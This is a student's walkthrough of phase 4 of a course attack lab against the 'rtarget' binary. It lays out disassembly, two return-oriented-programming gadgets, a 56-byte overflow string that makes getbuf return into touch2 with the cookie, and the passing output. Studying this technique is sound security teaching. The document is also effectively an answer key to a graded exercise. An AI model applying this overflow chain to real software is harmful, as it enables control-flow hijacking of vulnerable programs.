objdump -d rtarget
0000000000401808 <touch2>:
401808: 48 83 ec 08 sub $0x8,%rsp
40180c: 89 fe mov %edi,%esi
40180e: c7 05 e4 2c 20 00 02 movl $0x2,0x202ce4(%rip) # 6044fc <vlevel>
401815: 00 00 00
401818: 3b 3d e6 2c 20 00 cmp 0x202ce6(%rip),%edi # 604504 <cookie>
40181e: 75 1b jne 40183b <touch2+0x33>
401820: bf 68 2f 40 00 mov $0x402f68,%edi
401825: b8 00 00 00 00 mov $0x0,%eax
40182a: e8 51 f4 ff ff callq 400c80 <printf@plt>
40182f: bf 02 00 00 00 mov $0x2,%edi
401834: e8 c0 03 00 00 callq 401bf9 <validate>
401839: eb 19 jmp 401854 <touch2+0x4c>
40183b: bf 90 2f 40 00 mov $0x402f90,%edi
401840: b8 00 00 00 00 mov $0x0,%eax
401845: e8 36 f4 ff ff callq 400c80 <printf@plt>
40184a: bf 02 00 00 00 mov $0x2,%edi
40184f: e8 57 04 00 00 callq 401cab <fail>
401854: bf 00 00 00 00 mov $0x0,%edi
401859: e8 92 f5 ff ff callq 400df0 <exit@plt>
00000000004017c6 <getbuf>:
4017c6: 48 83 ec 18 sub $0x18,%rsp <= 0x18 = 24 bytes of stack buffer; Gets below receives only its address in %rdi and no length, so the three 8-byte padding rows in phase4.txt fill exactly this buffer before the saved return address
4017ca: 48 89 e7 mov %rsp,%rdi
4017cd: e8 38 02 00 00 callq 401a0a <Gets>
4017d2: b8 01 00 00 00 mov $0x1,%eax
4017d7: 48 83 c4 18 add $0x18,%rsp
4017db: c3 retq
emacs phase4.s
mov %rax, %rdi    # rdi = rax; this file exists only to obtain the instruction's byte encoding (48 89 c7, see phase4.d)
ret               # c3
gcc -c phase4.s
objdump -d phase4.o > phase4.d
emacs phase4.d
0000000000000000 <.text>:
0: 48 89 c7 mov %rax,%rdi
3: c3 retq
Save the file with CTRL+x then CTRL+c then y
Gadget 1
0000000000401970 <setval_352>:
401970: c7 07 e6 58 90 c3 movl $0xc39058e6,(%rdi)
401976: c3 retq
Gadget 1 address = 0x401970 + 3 = 0x401973, so execution starts at the `58` byte (pop %rax) and continues with `90 c3` (nop; ret)
Gadget 2
0000000000401984 <getval_322>:
401984: b8 48 89 c7 c3 mov $0xc3c78948,%eax
401989: c3 retq
Gadget 2 address = 0x401984 + 1 = 0x401985, so execution starts at `48 89 c7` (mov %rax,%rdi, as shown in phase4.d above) and continues with `c3` (ret)
cookie = 48 c7 c7 9f 5f 19 19 c3 (the cookie value 0x19195f9f is the little-endian `9f 5f 19 19`; the leading `48 c7 c7` is not part of the value and is dropped below)
emacs phase4.txt
00 00 00 00 00 00 00 00 /* padding */
00 00 00 00 00 00 00 00 /* padding */
00 00 00 00 00 00 00 00 /* padding */
73 19 40 00 00 00 00 00 /* gadget 1 */
9f 5f 19 19 c3 00 00 00 /* cookie 0x19195f9f, little-endian, with the first 3 bytes removed; this qword is popped into %rax. The leftover c3 in the 5th byte does not matter because touch2 compares only the low 32 bits (%edi) */
85 19 40 00 00 00 00 00 /* gadget 2 */
08 18 40 00 00 00 00 00 /* touch2 address */
Save the file with CTRL+x then CTRL+c then y
./hex2raw < phase4.txt > raw-phase4.txt
To see what hex2raw does with the bytes in phase4.txt, open the raw file:
emacs raw-phase4.txt
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@s^Y@^@^@^@^@^@\237_^Y^Y\
\303^@^@^@\205^Y@^@^@^@^@^@^H^X@^@^@^@^@^@
Save the file with CTRL+x then CTRL+c then y
./rtarget < raw-phase4.txt
Cookie: 0x19195f9f
Type string:Touch2!: You called touch2(0x19195f9f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!